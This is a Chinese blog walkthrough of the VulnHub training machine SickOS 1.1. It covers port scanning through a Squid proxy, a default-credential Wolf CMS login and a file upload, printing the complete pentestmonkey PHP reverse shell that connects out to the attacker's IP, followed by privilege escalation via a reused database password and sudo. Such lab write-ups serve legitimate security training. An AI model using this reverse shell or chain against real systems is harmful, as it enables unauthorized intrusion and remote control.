VulnHub渗透测试实战靶场 - SICKOS: 1.1

最新推荐文章于 2024-03-15 21:23:41 发布
最新推荐文章于 2024-03-15 21:23:41 发布
阅读量1.8k 收藏 2
点赞数 1
分类专栏: # VulnHub 文章标签: VulnHub 渗透测试 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/119485001
版权

VulnHub渗透测试实战靶场 - SICKOS: 1.1

环境下载

戳此进行环境下载

SICKOS: 1.1靶机搭建

将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
得到目标靶机的IP为:192.168.246.134

在这里插入图片描述

用Nmap探测一下目标靶机IP的端口信息:sudo nmap -sS -A 192.168.246.134,发现开放了22、3128、8080三个端口

在这里插入图片描述

通过Nmap扫到的端口信息可知,3128端口开放了一个代理服务,直接访问是访问不了靶机的80端口的,可以借助它的代理来访问
用dirb扫描一些web目录:dirb http://192.168.246.134 -p http://192.168.246.134:3128

在这里插入图片描述

漏洞挖掘

为了后续测试的便捷,先给浏览器添加一个代理

在这里插入图片描述
在这里插入图片描述

根据目录扫描的结果,访问:http://192.168.246.134/robots.txt

在这里插入图片描述

192.168.246.134/wolfcms进行扫描

在这里插入图片描述

http://192.168.246.134/wolfcms/docs/updating.txt页面中记录了更新的信息,发现系统采用的cms版本最新是0.8.2,搜索对应版本后发现存在文件上传漏洞

在这里插入图片描述

通过网页链接测试出后台登录页面:http://192.168.246.134/wolfcms/?/admin/login,尝试admin:admin成功登录后台

在这里插入图片描述

getshell

这里通过创建新文件或者上传文件都可以getshell

在这里插入图片描述

利用Kali自带的php反弹shell的脚本

<?php
phpinfo();
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.246.129';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

nc起一个监听,访问含有反弹shell的php文件,成功getshell

在这里插入图片描述

提权

查看内核版本信息:uname -a,发现系统为3.11.0-15-generic,尝试溢出提权的方式来进行提权操作,利用脏牛漏洞来进行提权操作

在这里插入图片描述

攻击机起一个Http服务让靶机下载exp

在这里插入图片描述
在这里插入图片描述

使用命令:gcc -pthread dirty.c -o dirty -lcrypt来编译exp,执行exp后发现靶机会自己修复,没法执行脏牛

继续寻找有效信息,在/var/www/wolfcms/config.php中发现数据库的账户和密码:root:john@123

在这里插入图片描述

查看/etc/passwd,发现sickos用户可以尝试利用

在这里插入图片描述

成功利用前面获取到的数据库密码登录切换到用户sickos,查看用户id以及组id信息

在这里插入图片描述

发现用户sickos在sudo组,直接sudo提权,成功拿到root权限

在这里插入图片描述

H3rmesk1t
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
CTF难度表(Vulnhub) 此备忘单针对CTF玩家和初学者,可帮助他们根据他们的难度对Vulnhub实验室进行分类。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并直接向查询和反馈。 跟着我们 目录 简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级 Kioptrix:1.2级 Kioptrix:1.3级 Kioprtix:5 安全操作系统:1 订书机 SickOS 1.1 SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并直接向查询和反馈。 跟着我们 Kioptrix:1.3级 Kioprtix:5 安全操作系统:1 订书机 SickOS 1.1 SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
红队笔记3-SickOS1.1打靶流程解法1-穿越Squid代理的CMS渗透(vulnhub
最新发布
qq_63442530的博客
03-15 993
1.端口扫描:发现存活端口:22 ,3128(squid-http) ,8080,其中squid-http是个代理服务器2.开始访问3128,8080都访问不到,目录扫描也扫描不出结果,根据我们知道squid是个代理服务器,尝试Dirb -p参数,挂代理目录爆破,成功扫出来一些路径。然后浏览器设置代理访问,找到了wolfcms的页面。3.通过浏览器获得wolfcms后台路径,通过弱口令登录后台,寻找后台代码执行和文件上传的位置,构造反弹命令写入代码执行,反弹shell。
vulnhub靶机渗透 sick0s1.1
RestoreJustice的博客
03-19 190
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。木马所在的public录入前面扫描时已经扫到,所以木马位置为http://192.168.110.132/wolfcms/试着访问http://192.168.110.132/,发现无法访问。查看开放的端口,发现3306开启,但是发现mysql版本大于5.1,无法udf提权。/test.php,使用蚁剑连接,记得挂上靶机的3128代理。
Vulhub sickos1.1靶机
小小猪的博客
06-11 154
Vulhub sickos1.1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.237 设置代理 访问http://x.x.x.237/robots.txt 访问/wolfcms目录 发现存在CMS。。。那么管理员界面呢? 发现files 面板下的权限 上传木马 访问http://x.x.x.237/wolfcms/public/shell.php,进行反弹 查看一下:$ cat /var/www/wolfcm.
靶机渗透练习38-SickOs1
hirak0的博客
04-18 848
靶机描述 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ Description About Release Name........: SickOs1.1 Date Release: 11 Dec 2015 Author......: D4rk Series......: SickOs Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt Tester(s)...: h1tch1 Tw
「红队笔记」靶机精讲:SickOS1.1 - 穿越Squid代理的CMS渗透
m0_73612768的博客
11-29 1125
本文是作者在观看B站《红队笔记》后做的一些笔记以及相关知识的补充。靶机精讲之SickOS1.1,vulnhub靶机,需要配置代理,穿越Squid实现对CMS渗透,完整的攻击链,对基本功要求比较高,不难,但也需要全局观和细节操作。能顺利完成本机渗透,也证明你在不断进步。此为方法一,本机还有全然不同的第二种打法。
红队打靶:SickOS1.1详细打靶思路(vulnhub
Bossfrank的博客
06-07 1065
本文是vulnhub靶机sickos详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。本文使用了squid代理分析+wolfcms渗透的思路获取shell。下一篇文章将详述利用shellshock漏洞进行渗透的思路。
VulnHub靶机渗透实战9-vikings
随心所欲不逾矩
11-25 727
本次靶机是CTF风格的靶机。靶场地址:Vikings: 1 ~ VulnHub fcrackzip工具也能用来爆破密码。 用户名密码:floki/f@m0usboatbuilde7 所以boat的意思是让我们对第二十九个质数做考拉兹猜想,所得到的数的数列,其中可打印的字符(ascall可以代表的字符,256以内),就是我们要得到的首先我们编写一段简单的python代码来计算出第二十九个质数。 再编写一个简单python做考拉兹猜想,并且输出所有ascall为256以内的字
红队渗透靶场SickOs1.1
xf555er的博客
12-06 962
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
pokemon-gpt-2
04-23
对于那些想要在本地运行此代码的人(sickos!),以下是关键文件的简要说明: image - to - text.py-将图像转换为基于文本的格式以进行训练。 text- to - image.py-将基于文本的图像格式转换为PNG。 train.py-用...
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
qq_61702710的博客
07-15 2180
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
Vulnhub系列:SickOS1.1
Ays.Ie的博客
03-05 401
继续更新vulnhub的靶机,巩固渗透技术,分享做题思路,打开思维局限
SickOs1.1
m0_66299232的博客
09-23 1055
其后台入口是http://192.168.166.129/wolfcms/?nmap -p- -A -T4 -sV 192.168.166.129 //探测目标靶机开放端口和相应服务情况。6.使用weevely连接木马,因为url需要代理才可以访问,这里需要现在环境变量中配置代理。上传成功,下一步用weevely来连接,连接的时候后面一定也要带cmd 这是密码。7.连接成功后在网站目录下发现config.php文件,发现数据库密码。cmd是密码 /root/weiqin.php 是路径。
SickOs1.1--靶机实操详解
qq_61802750的博客
08-05 174
所以我们要去找到它的管理员路径。这个系统没有做多少的自定义的功能,还是老旧的系统,我们可以通过:1.猜测;这样的话我们有理由去推测:整个系统就是administertor,所以我们能不能找到它的凭据,从而利用它的身份。这样我们就得到了一个root用户,但我们无法得出是22端口的ssh用户还是3128端口的用户。打开浏览器,对3128端口和8080端口进行访问,虽然说8080端口是关闭的,但我们还是要进行尝试。好了,我们看到了wolfcms的这么一个内容管理系统,那么在这个系统中,artcles中,有。
VulnHub-SickOs1.1
热门推荐
江左盟的博客
07-07 1万+
信息收集 使用 漏洞发现 漏洞利用
12-vulnhub-SickOs 1.1
尼德霍格007
08-03 385
vulnhub-SickOs 1.1 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-8-2 一、信息收集 扫描目标主机ip地址 nmap -sP 192.168.21.0/24 可以看到靶机ip地址是192.168…21.148,192.168.21.128是kali攻击机的ip地址 接下来扫描开放的端口 nmap -A -p 1-64000 192.168.
红队打靶:SickOS1.1详细打靶思路之shellshock漏洞利用(vulnhub
Bossfrank的博客
06-08 522
本文详述了vulnhub靶机sickOS1.1的打靶过程。本文利用了bash漏洞shellshock获取初始立足点,并使用定时任务进行提权。不同于单纯的writeup,本文更注重打靶每一步的思路用意。本文涉及的知识点包括nikto扫描、shellshock漏洞利用、msfvenom生成payload、定时任务提权等。采用squid代理分析+web渗透cms后台获取root权限的思路详见我的上一篇博客。
vulnhub靶机系列:
09-09
Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值